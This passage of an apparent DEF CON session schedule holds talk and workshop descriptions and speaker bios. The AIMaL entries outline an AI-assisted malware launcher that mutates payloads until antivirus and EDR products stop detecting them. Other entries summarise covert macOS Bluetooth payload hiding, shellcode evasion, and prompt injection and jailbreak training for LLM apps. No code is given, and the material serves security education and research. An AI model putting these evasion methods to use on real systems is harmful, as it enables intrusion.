Gregory Carpenter is the CSO of KnowledgeBridge International, a Fellow of the Royal Society for the Arts, and the National Security Agency’s Operations Officer of the Year. He serves on the Board of Directors for ATNA Systems, is a Senior Advisor for ARIC, Inc., and is a Special Operations Medical Association and Military Cyber Professionals Association member. He is a former member of the Board of Advisors for EC-Council University and the International Board of Advisors for the Mackenzie Institute.

He has held various senior military and civilian positions, including COO, VP for Cyber Operations, Chief of Security Testing, Counterintelligence Division Chief, Chief of Special Space Operations, and Functional Team Lead for Electronic Warfare. He has been an epidemiological primary investigator. Gregory is a retired army officer of 27 years, he holds a Doctorate in Public Health. He is a Certified Information Security Manager, Lean Six-Sigma Black Belt, and ISO-9000 lead auditor.

SpeakerBio:  Barb Hirz, Director of Strategy and Innovation at Nebraska Defense Research Corporation

Ms. Barb Hirz is the Director of Strategy and Innovation at the Nebraska Defense Research Corporation, where she leads future capability integration and coordinates with customers and mission partners to ensure effective capability demonstrations. She is dedicated to advancing defense technology, driving mission improvements, and fostering intellectual agility in the workforce to address complex Department of Defense (DoD) challenges. Previously, Ms. Hirz served as Chief Engineer at U.S. Strategic Command, overseeing nuclear mission capability and cyber requirements, and has held positions at the Office of the Secretary of Defense and the National Security Agency. She has a background in commercial banking and IT solutions and holds numerous awards, including the Joint Meritorious Civilian Service Award. Ms. Hirz earned a B.S. in Business Administration from Creighton University, an M.S. in Military Operational Art from the Air Command and Staff College, and a Graduate Certificate in Nuclear Deterrence from Harvard University.

SpeakerBio:  Bret Fowler, Chief Executive Officer at STAGMSGT (Ret)

Brett Fowler is a nationally recognized cybersecurity expert and the CEO of STAG, a rapidly growing cybersecurity firm with a global reach and an exponential growth rate of 230% in 2020. A lifelong technology ambassador, Brett began his journey in middle school and has since advised Congressional and Senatorial leaders, while also supporting national efforts, including securing U.S. election systems. Under his leadership, STAG is transforming advanced analytics into accessible web applications, filling critical market gaps. A former U.S. Air Force Cyber Warfare Operator with over 3,000 hours of cyber operations experience, Brett combines deep technical expertise with agile leadership, driving innovation and resilience in both government and industry. He is a trusted voice on national advisory boards and a frequent lecturer at the University of Texas at San Antonio, where he teaches courses on cybersecurity and entrepreneurship. Brett holds an M.S. in Computer Science from Utica College and lives in San Antonio, TX, with his wife and children.

SpeakerBio:  John Andre Bjørkhaug, Netsecurity

John-André Bjørkhaug has worked as a penetration tester for over 16 years. He has a degree in electrical engineering but prefer to break things instead of building things. This led him to become a hacker/penetration tester. John's main focus is penetration testing of internal infrastructure and physical security system together with social engineering and full scale Red Team tests.

SpeakerBio:  John Johnson, CEO at Founder of Aligned SecurityDr

Dr. Johnson has over 30 years of experience leading technology and cybersecurity programs at organizations in various industry segments, from startups to large global corporations. He is the CEO and Founder of Aligned Security, providing executive cybersecurity advisory services. He also founded the nonprofit Docent Institute, which promotes career development, cybersecurity education and outreach to professionals, students and underserved communities. He is co-founder of Chicago Cyber Hub, a Midwest center of excellence for Cybersecurity. John has broad industry experience, starting at Los Alamos National Laboratory and subsequently as a security leader at large and small enterprises, including John Deere, Deloitte, and Campbell Soup Company. He has developed and taught numerous university cybersecurity courses online and in person. Dr. Johnson serves on the ISSA International Board of Directors, ISSA Education Foundation, and is an active leader within ISC2, InfraGard, and IEEE. John is concerned with the ethical use of advancing technologies and the opportunities and risks they pose to humanity.

SpeakerBio:  Michael Tassey, Managing Director at Broadmoor Consulting Inc.

Mike Tassey is a cybersecurity strategist with 27 years of experience across defense, finance, and critical infrastructure. At the Air Force Office of Special Investigation, he led red team operations and secured global investigative systems. At NASDAQ, he helped defend the exchange from nation-state cyber threats and re-architect its global security posture. A DEF CON and Black Hat speaker, Mike co-designed the Wireless Aerial Surveillance Platform—the first civilian cyber drone, now in the International Spy Museum.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-14:50 PDT


Title: Adversary Intel Lab: Build Your First Threat Emulation Plan
When: Friday, Aug 8, 14:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

Attendees sit down with real-world threat intelligence and walk through the process of analyzing a threat actor, identifying relevant TTPs, and creating a red team emulation plan using ATT&CK Navigator. By the end, they’ll have a completed adversary worksheet and a mini playbook for red team usage.

SpeakerBio:  Fredrik Sandström, Basalt

Fredrik Sandström, M.Sc. is Head of Cyber Security at Basalt, based in Stockholm, Sweden. He has nearly a decade of experience in penetration testing, alongside a background in software development and embedded systems engineering. His early work includes software development for organizations such as the Swedish Defence Research Agency (FOI).

Since 2015, Fredrik has focused on delivering advanced security assessments—including penetration testing, red teaming, and threat emulation—for clients in diverse sectors such as banking, insurance, automotive, energy, communications, and IT services. He holds multiple industry-recognized certifications, including GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GCPN (GIAC Cloud Penetration Tester), GRTP (GIAC Red Team Professional), and HTB Certified Bug Bounty Hunter (CBBH).

Fredrik is also an active contributor to the security community. He has presented at major conferences such as SEC-T—Sweden’s leading offensive security conference—and DevCon in Bucharest, Romania, a key event for developers and IT professionals in Eastern Europe.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 19:00-20:59 PDT


Title: AI Art Battle
When: Friday, Aug 8, 19:00 - 20:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

Welcome to the "AI Art Battle" Generative AI Art Contest!

This unique competition invites creative minds to dive into the world of artificial intelligence and art. The challenge is to craft the most imaginative prompts that will be used by generative AI models to create artwork.

Contestants will not be creating the art themselves; instead, they will focus on designing prompts for well-known topics that push the boundaries of creativity and innovation.

How It Works:

Select a Topic:

Contestants will choose from a list of random topics.

These could range from historical events, famous literary works, mythical creatures, futuristic landscapes, to iconic pop culture references.

Craft a Prompt:

Using their creativity, contestants will write a detailed prompt designed to guide AI models in generating original artwork. The prompts should be clear, imaginative, and offer enough detail to spark the AI's artistic capabilities.

Submission:

Each contestant will submit their prompt and the intended outcome.

AI Generation:

The submitted prompts will be fed into a generative AI art model, which will create corresponding artworks based on the prompts.

A random panel will determine who the winners are.

Participant Prerequisites

Pre-Qualification


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: AI SecureOps: Attacking & Defending AI Applications and Services
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Can prompt injections lead to complete infrastructure takeovers? Could AI applications be exploited to compromise backend services? Can data poisoning in AI copilots impact a company's stock? Can jailbreaks create false crisis alerts in security systems? This immersive, CTF-styled training in GenAI and LLM security dives into these pressing questions. Engage in realistic attack and defense scenarios focused on real-world threats, from prompt injection and remote code execution to backend compromise. Tackle hands-on challenges with actual AI applications to understand vulnerabilities and develop robust defenses. You’ll learn how to create a comprehensive security pipeline, mastering AI red and blue team strategies, building resilient defenses for LLMs, and handling incident response for AI-based threats. Additionally, implement a Responsible AI (RAI) program to enforce ethical AI standards across enterprise services, fortifying your organization’s AI security foundation.

By 2026, Gartner, Inc. predicts that over 80% of enterprises will engage with GenAI models, up from less than 5% in 2023. This rapid adoption presents a new challenge for security professionals. To bring you up to speed from intermediate to advanced level, this training provides essential GenAI and LLM security skills through an immersive CTF-styled framework. Delve into sophisticated techniques for mitigating LLM threats, engineering robust defense mechanisms, and operationalizing LLM agents, preparing them to address the complex security challenges posed by the rapid expansion of GenAI technologies. You will be provided with access to a live playground with custom built AI applications replicating real-world attack scenarios covering use-cases defined under the OWASP LLM top 10 framework and mapped with stages defined in MITRE ATLAS. This dense training will navigate you through areas like the red and blue team strategies, create robust LLM defenses, incident response in LLM attacks, implement a Responsible AI(RAI) program and enforce ethical AI standards across enterprise services, with the focus on improving the entire GenAI supply chain.

This training will also cover the completely new segment of Responsible AI(RAI), ethics and trustworthiness in GenAI services. Unlike traditional cybersecurity verticals, these unique challenges such as bias detection, managing risky behaviors, and implementing mechanisms for tracking information are going to be the key challenges for enterprise security teams.

By the end of this training, you will be able to:

SpeakerBio:  Abhinav Singh

Abhinav Singh is an esteemed cybersecurity leader & researcher with over a decade of experience across technology leaders, financial institutions, and as an independent trainer and consultant. Author of "Metasploit Penetration Testing Cookbook" and "Instant Wireshark Starter," his contributions span patents, open-source tools, and numerous publications. Recognized in security portals and digital platforms, Abhinav is a sought-after speaker & trainer at international conferences like Black Hat, RSA, DEFCON, BruCon and many more, where he shares his deep industry insights and innovative approaches in cybersecurity. He also leads multiple AI security groups at CSA, responsible for coming up with cutting-edge whitepapers and industry reports around safety and security of GenAI.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: AI SecureOps: Attacking & Defending AI Applications and Services
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Can prompt injections lead to complete infrastructure takeovers? Could AI applications be exploited to compromise backend services? Can data poisoning in AI copilots impact a company's stock? Can jailbreaks create false crisis alerts in security systems? This immersive, CTF-styled training in GenAI and LLM security dives into these pressing questions. Engage in realistic attack and defense scenarios focused on real-world threats, from prompt injection and remote code execution to backend compromise. Tackle hands-on challenges with actual AI applications to understand vulnerabilities and develop robust defenses. You’ll learn how to create a comprehensive security pipeline, mastering AI red and blue team strategies, building resilient defenses for LLMs, and handling incident response for AI-based threats. Additionally, implement a Responsible AI (RAI) program to enforce ethical AI standards across enterprise services, fortifying your organization’s AI security foundation.

By 2026, Gartner, Inc. predicts that over 80% of enterprises will engage with GenAI models, up from less than 5% in 2023. This rapid adoption presents a new challenge for security professionals. To bring you up to speed from intermediate to advanced level, this training provides essential GenAI and LLM security skills through an immersive CTF-styled framework. Delve into sophisticated techniques for mitigating LLM threats, engineering robust defense mechanisms, and operationalizing LLM agents, preparing them to address the complex security challenges posed by the rapid expansion of GenAI technologies. You will be provided with access to a live playground with custom built AI applications replicating real-world attack scenarios covering use-cases defined under the OWASP LLM top 10 framework and mapped with stages defined in MITRE ATLAS. This dense training will navigate you through areas like the red and blue team strategies, create robust LLM defenses, incident response in LLM attacks, implement a Responsible AI(RAI) program and enforce ethical AI standards across enterprise services, with the focus on improving the entire GenAI supply chain.

This training will also cover the completely new segment of Responsible AI(RAI), ethics and trustworthiness in GenAI services. Unlike traditional cybersecurity verticals, these unique challenges such as bias detection, managing risky behaviors, and implementing mechanisms for tracking information are going to be the key challenges for enterprise security teams.

By the end of this training, you will be able to:

SpeakerBio:  Abhinav Singh

Abhinav Singh is an esteemed cybersecurity leader & researcher with over a decade of experience across technology leaders, financial institutions, and as an independent trainer and consultant. Author of "Metasploit Penetration Testing Cookbook" and "Instant Wireshark Starter," his contributions span patents, open-source tools, and numerous publications. Recognized in security portals and digital platforms, Abhinav is a sought-after speaker & trainer at international conferences like Black Hat, RSA, DEFCON, BruCon and many more, where he shares his deep industry insights and innovative approaches in cybersecurity. He also leads multiple AI security groups at CSA, responsible for coming up with cutting-edge whitepapers and industry reports around safety and security of GenAI.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 15:00-15:50 PDT


Title: AI-Powered Web Applications: A New Era in Security – Live Technical Demo
When: Friday, Aug 8, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

In this session, we’ll take a deep dive into the future of web security through the lens of ethical hacking and artificial intelligence. Attendees will have the opportunity to see AI in action through a live demo, where we will demonstrate how AI can identify and resolve security flaws in web applications. The session will feature real-time security testing using AI-powered tools, illustrating how these technologies give ethical hackers an edge in the fight against malicious attacks.

SpeakerBio:  Ilkin Javadov

As an ethical hacker and security expert, Ilkin Javadov has made significant contributions to the cybersecurity community. A frequent speaker at world-renowned cyber conferences such as GISEC 2023-2024, DEFCON 31 Red Team Village 2023-2024, and InCyber Forum Canada 2023-2024, Ilkin shares valuable insights into the latest cyberthreats and defense strategies. Notably, Ilkin is one of the elite 20 hackers who ethically infiltrated the German Armed Forces (Bundeswehr) earning a place in their Hall of Fame and receiving a prestigious medal from a General in recognition of exceptional contributions to national security. With extensive experience in ethical hacking and cybersecurity, Ilkin continues to advance the field by mentoring and educating the next generation of security professionals.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 09:00-09:45 PDT


Title: AIMaL - Artificially Intelligent Malware Launcher
When: Saturday, Aug 9, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other evasion techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell's Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly, rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into a clean, testable interface. Live demo will include payload staging, detection simulation, and mutation in action.

Speakers:Endrit Shaqiri,Natyra Shaqiri

SpeakerBio:  Endrit Shaqiri

Endrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.

SpeakerBio:  Natyra Shaqiri

Natyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 10:00-10:45 PDT


Title: AIMaL - Artificially Intelligent Malware Launcher
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other evasion techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell's Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly, rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into a clean, testable interface. Live demo will include payload staging, detection simulation, and mutation in action.

Speakers:Endrit Shaqiri,Natyra Shaqiri

SpeakerBio:  Endrit Shaqiri

Endrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.

SpeakerBio:  Natyra Shaqiri

Natyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-13:50 PDT


Title: AIMaL: Artificially Intelligent Malware Launcher
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 1 - Map

Description:

AIMAL (Artificially Intelligent Malware Launcher) is a modular red team framework built to simulate advanced malware evasion techniques against modern AV/EDR/IDS solutions. It supports Process Herpaderping, Process Hollowing, Thread Hijacking, Process Ghosting, and many other Evasion Techniques as delivery mechanisms, with stealth enhancements including PPID spoofing, shellcode polymorphism, syscall mutation (Hell’s Gate), and aggressive AMSI/ETW bypassing. AIMAL adapts to simulated detection responses through a feedback loop that mutates behavior on the fly — rotating techniques until the payload bypasses detection. Integration with the OpenAI API allows AIMAL to suggest the best evasion strategy based on alert context, helping simulate the decision-making process of advanced threat actors. Designed for research, red teaming, and adversarial simulation, AIMAL brings real-world stealth techniques into an intelligent feedback-driven system that learns and adapts like an evolving threat. Whether used for red team drills or research into next-gen evasion, AIMaL demonstrates how AI can weaponize malware beyond static signatures and into dynamic decision-making.

This process is not just about executing code — it’s about demonstrating how real malware adapts. The user is taken through a full offensive simulation workflow: 1. AIMAL prints a stylized menu with ET options. 2.The user selects an evasion technique (e.g., Process Herpaderping). 3. The user selects a payload (e.g., reverse shell). 4. AIMAL copies and prepares the full module structure (not just EXEs). 5. The user simulates a detection alert type and string. 6. AIMAL uses OpenAI to suggest a bypass strategy. 7. The user can authorize AIMAL to automatically:Addjunkfunctions (hash evasion), Inject stealth upgrades (e.g., call RandomNoise(), add extra PolymorphShellcodeAfter()), Apply PPID spoofing or syscall mutations, Rebuild, mutate and repack the payload.

AIMAL has already demonstrated success against multiple AVs. Using static stealth alone, it bypassed both signature and behavioral detection of Windows Defender and McAfee. Bitdefender and Kaspersky were bypassed on static signatures; after OpenAI integration, AIMAL also defeated their behavioral detection.

https://github.com/EndritShaqiri/AIMaL

Speakers:Endrit Shaqiri,Natyra Shaqiri

SpeakerBio:  Endrit Shaqiri

Endrit Shaqiri is an offensive security researcher, red team tool developer, and international karate champion currently pursuing his Master’s in Cybersecurity Engineering and Cryptography at Istanbul Technical University. He is also admitted to Boston University’s Master’s in Artificial Intelligence program, where he plans to continue his research on AI-powered malware and adaptive evasion systems. He is the creator of AIMaL — the Artificially Intelligent Malware Launcher — a modular framework designed for simulating modern malware evasion techniques against AV/EDR/IDS systems. Endrit has built a tool that bridges hands-on malware development with AI-assisted mutation logic. His passion lies in crafting adaptive malware simulation frameworks for red teamers, researchers, and students alike. This is his first appearance at DEF CON, bringing a glimpse of how tomorrow’s adversaries may automate and evolve in real-time.

SpeakerBio:  Natyra Shaqiri

Natyra Shaqiri is a cybersecurity student at Southern Maine Community College with a growing focus on malware analysis, system security, and ethical hacking. As co-developer of AIMAL — the Artificially Intelligent Malware Launcher — Natyra has contributed to the design and modularization of the tool’s evasion techniques, helping implement feedback-driven mutation logic and stealth strategy testing. She is passionate about adversarial security, system internals, and hands-on red team simulation frameworks. This marks her debut at DEF CON, where she brings the perspective of a rising cybersecurity engineer.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 10:00-10:45 PDT


Title: AirBleed - Covert Bluetooth Plist Payload Injection
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

AirBleed is a proof-of-concept hack demonstrating a hidden communication technique leveraging a little-known vulnerability in macOS's Bluetooth property list files (Bluetooth.plist). By fragmenting payloads into tiny pieces and injecting them into device caches that go unnoticed by standard security tools, this capability enables operatives to establish dead-drop channels for passing critical data — all without arousing suspicion. [1] Stealth-by-Design: Uses legitimate Bluetooth device caches to hide encrypted payloads up to 248 bytes per fragment. [2] Dual-Use Impact: Enables clandestine communication or counter-plotter operations by law enforcement and intel. [3] Live Demo: DEFCON demo will allow attendees to send their own Bluetooth plist payloads to a vulnerable MacBook Pro. [4] Implications: Offers a novel toolkit for counterintelligence to monitor — and disrupt — hidden networks and dead drops.

Speakers:Ray "CURZE$" Cervantes,Yvonne "Von Marie" Cervantes

SpeakerBio:  Ray "CURZE$" Cervantes

Ray is an offensive security engineer and counterintelligence innovator with a background in forensic psychology, turning aggressive tradecraft into powerful defense tools. He is currently researching facial behavioral analysis and creating AI-driven solutions for the legal and trial consulting fields. ChatGPT, Copilot, and Claude all predict that his work will land him in handcuffs within 5–10 years — a risk Ray embraces as proof he’s pushing the boundaries of security and innovation.

SpeakerBio:  Yvonne "Von Marie" Cervantes

Yvonne is a YouTube craft content creator and handmade crafter featured in craft magazines for her work on unique art pieces. She currently designs for four design company teams and also creates comic books with Ray. She is currently researching facial behavioral analysis through designing research ideas and strategies for improving the legal and trial consulting fields.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 09:00-09:45 PDT


Title: AirBleed - Covert Bluetooth Plist Payload Injection
When: Saturday, Aug 9, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

AirBleed is a proof-of-concept hack demonstrating a hidden communication technique leveraging a little-known vulnerability in macOS's Bluetooth property list files (Bluetooth.plist). By fragmenting payloads into tiny pieces and injecting them into device caches that go unnoticed by standard security tools, this capability enables operatives to establish dead-drop channels for passing critical data — all without arousing suspicion. [1] Stealth-by-Design: Uses legitimate Bluetooth device caches to hide encrypted payloads up to 248 bytes per fragment. [2] Dual-Use Impact: Enables clandestine communication or counter-plotter operations by law enforcement and intel. [3] Live Demo: DEFCON demo will allow attendees to send their own Bluetooth plist payloads to a vulnerable MacBook Pro. [4] Implications: Offers a novel toolkit for counterintelligence to monitor — and disrupt — hidden networks and dead drops.

Speakers:Ray "CURZE$" Cervantes,Yvonne "Von Marie" Cervantes

SpeakerBio:  Ray "CURZE$" Cervantes

Ray is an offensive security engineer and counterintelligence innovator with a background in forensic psychology, turning aggressive tradecraft into powerful defense tools. He is currently researching facial behavioral analysis and creating AI-driven solutions for the legal and trial consulting fields. ChatGPT, Copilot, and Claude all predict that his work will land him in handcuffs within 5–10 years — a risk Ray embraces as proof he’s pushing the boundaries of security and innovation.

SpeakerBio:  Yvonne "Von Marie" Cervantes

Yvonne is a YouTube craft content creator and handmade crafter featured in craft magazines for her work on unique art pieces. She currently designs for four design company teams and also creates comic books with Ray. She is currently researching facial behavioral analysis through designing research ideas and strategies for improving the legal and trial consulting fields.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Sunday - 12:00-12:59 PDT


Title: Airport Security! - S01 E008 - Breaking into your baggage
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

When we travel with valuable baggage, we rely on the security of locks, especially those that are TSA-approved. But how secure are they really? In this talk, we’ll present our research on the vulnerabilities and bypasses of these locks and their embedding into the baggage, covering the most common models as well as the newer TSA008. We’ll discuss how lock picking techniques, master keys, and bypass methods can compromise the security of all TSA-approved models, potentially putting our belongings at risk.

SpeakerBio:  Hector Cuevas Cruz, Bishop Fox

Héctor is a Senior Managing Security Consultant at Bishop Fox with over 13 years of experience in offensive security, digital forensics, threat hunting, and incident response. Hector has presented at international conferenses such as DEFCON, SummerCon, WWHF & Ekoparty. He also leads Pwntacles, a student-driven hackerspace focused on cybersecurity research and development.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 10:30-11:30 PDT


Title: AixCC Award Announcement
When: Friday, Aug 8, 10:30 - 11:30 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

HHV - Friday - 17:00-17:59 PDT


Title: All your keyboards are belong to us!
When: Friday, Aug 8, 17:00 - 17:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

This is a live tutorial of hacking against keyboards of all forms. Attacking the keyboard is the ultimate strategy to hijack a session before it is encrypted, capturing plaintext at the source and (often) in much simpler ways than those required to attack network protocols.

In this session we explore available attack vectors against traditional keyboards, starting with plain old keyloggers. We then advance to "Van Eck Phreaking" style attacks against individual keystroke emanations as well as RF wireless connections, and we finally graduate to the new hotness: acoustic attacks by eavesdropping on the sound of you typing!

Use your newfound knowledge for good, with great power comes great responsibility!

A subset of signal leak attacks focusing on keyboards. This talk is compiled with open sources, no classified material will be discussed.

SpeakerBio:  Federico Lucifredi, Product Management Director for Ceph Storage at IBM and Red Hat
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 17:00-17:45 PDT


Title: Amber64: Mining Hacker History from Over Half a Million Commodore 64 Disks
When: Saturday, Aug 9, 17:00 - 17:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

The Commodore 64 home computer, which sold at least 12.5 million units from 1982 to 1994, was widely used during a formative early decade in the subcultures of hacking, phreaking, piracy, and cybercrime. Like ancient insects trapped in amber, discovered and studied millions of years later, ephemera of hacker history has been fortuitously preserved in the file system structures of C64 floppy disks from the 1980s and 90s.

Enthusiasts and researchers have created byte-for-byte copies of disks in order to preserve games, applications, and demos of the time period. What is less obvious, however, is that users of the time tended to reuse disks, deleting old files to make space for new programs. This and other use patterns have resulted in interesting data being retained in unallocated sectors alongside the overtly-accessible programs and data. Often, this data can be recovered and includes logs of online sessions, hacker text files, and more.

In this talk, Dr. McGrew describes software and workflow he developed to perform forensic processing and full-text indexing of over 650,000 unique C64 floppy disk images from publicly-accessible online archives. He will also present interesting findings from searches and analysis that illustrate, for the modern audience, day-to-day hacker communications and tools of the past.

References:

SpeakerBio:  Wesley McGrew

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 10:00-11:50 PDT


Title: AML Cryptocurrency Compliance
When: Friday, Aug 8, 10:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Students receive exposure to the law side of cryptocurrency business, including certification, regulation, government policy, and risk assessment. Regulators around the world evaluate and implement diverse regulations governing the use and applications of Blockchain reflecting varying degrees of acceptance ranging from blanket prohibition to highly facilitating frameworks. Organisations, in turn, assess the related risks and legal challenges. This workshop considers emerging trends and security essentials vital for business and financial businesses, providing a brief overview of AML and KYC and suggestions to increase security and decrease risk exposure.

Speakers:Joseph,Chelsea Button

SpeakerBio:  Joseph
No BIO available
SpeakerBio:  Chelsea Button, Cryptocurrency Education Initiative

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Analyzing and Creating Windows Shellcode for Hackers
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N256 - Map

Description:

Get ready to leap into the wild world of Windows shellcode! This fast-paced workshop covers how to analyze and create shellcode, using state-of-the-art tools. Intended for those with intermediate knowledge, this workshop will review x86 assembly; you will learn Windows internals, and advanced shellcoding techniques. You’ll learn how to dissect shellcode with x32Dbg or WinDbg and how to use the SHAREM shellcode emulator for deep analysis and disassembly. After analyzing several samples, we’ll build our own shellcode, starting simple and moving on to intermediate multi-API shellcode. You will learn how to encode your shellcode, for evasion, and how to incorporate Windows syscalls directly into your shellcode, for extra stealth. Finally, we will cover converting DLLs to shellcode. Expect to be made privy to a variety of shellcoding tips and tricks. By the end, you’ll be able to: • Quickly read and debug obfuscated shellcode; • Implement GetPC techniques in shellcode; • Chain WinAPIs to pass handles/pointers; • Add direct Windows syscalls for stealth to shellcode; • Convert DLLs to shellcode with sRDI. Prep: Study x86 assembly and basic Windows debugging. We recommend a Windows VM with Windows Defender disabled, plus NASM, x32Dbg, WinDbg (classic), SHAREM, and ShellWasp.

Speakers:Bramwell Brizendine,Austin Norby,Logan Cannan

SpeakerBio:  Bramwell Brizendine, Director at VERONA Lab

Dr. Bramwell Brizendine has a Ph.D. in Cyber Operations and is the Director of the VERONA Lab. Bramwell has regularly spoken at DEFCON and presented at all regional editions of Black Hat (USA, Europe, Asia, MEA), as well as at Hack in the Box Amsterdam and Wild West Hackin' Fest. Bramwell received a $300,000 NSA research grant to create the SHAREM shellcode analysis framework, which brings unprecedented capabilities to shellcode analysis. He has additionally authored ShellWasp, which facilitates using Windows syscalls in shellcode, as well as two code-reuse attack frameworks, ROP ROCKET and JOP ROCKET. Bramwell has previously taught undergraduate, master's, and Ph.D. courses on software exploitation, reverse engineering, offensive security, and malware analysis. He currently teaches cybersecurity courses at the University of Alabama in Huntsville.

SpeakerBio:  Austin Norby, Director of Internal Research and Development at Bogart Associates

Dr. Austin Norby is a seasoned cybersecurity professional with over a decade of experience supporting the Department of Defense. He earned his bachelor's degrees in mathematics and computer science from the University of Minnesota, a master's degree from the Naval Postgraduate School, and a Doctorate in Cyber Operations from Dakota State University, specializing in anti-debugging techniques. Currently, Dr. Norby serves as the Director of Internal Research and Development at Bogart Associates, where he is responsible for spearheading the creation of advanced cybersecurity solutions for government use. His technical proficiencies include reverse engineering, malware analysis, and software engineering, with a strong focus on developing robust cyber capabilities in C, C++, Intel assembly, and Python.

SpeakerBio:  Logan Cannan, Ph.D. Candidate, University of Alabama in Huntsville 

